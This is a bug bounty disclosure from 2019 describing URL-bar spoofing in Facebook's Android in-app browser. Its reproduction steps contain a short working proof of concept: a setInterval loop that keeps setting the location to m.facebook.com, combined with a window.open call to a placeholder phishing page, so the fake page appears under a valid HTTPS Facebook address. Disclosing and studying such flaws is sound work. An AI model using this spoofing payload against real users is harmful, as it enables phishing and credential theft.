Published On: 13 May 2019
URL spoofing in Facebook Mobile Browser
Other
Facebook | Android
$3000
MEDIUM VALIDDescription
This could have let a malicious user spoof the URL bar of multiple Facebook Android apps by navigating to a different domain on the original tab after a new tab had been opened using the setInterval method.
Impact
Attacker could do perfect phishing attack on facebook user with valid ssl facebook url.
Reproduction Steps
Step
1
Create a html file with below snippet:
<script>
function fb()
{
location = “https://m.facebook.com/"
}
setInterval(“fb()”, 10);
</script>
above js code call fb() function for every 10ms time delay with given url to window location (its kind of DDoS).
the put below snippet to call window.open
<img src=”/fblogin.png” onclick=”window.open(‘http://yourdomain/phishingpage.html')">
above html will call window.open event on image click(you can also automate this),
once clicked this will open your phishing page in the new window with keeping same url which called by setInterval.
So you will get HTTPS url in the address bar with phishing page.
Not applicable to Valid
This bug was closed as NA initially as social engineering attack but i have chained with another bug then FB triaged, i will publish chained part once fix.
Videos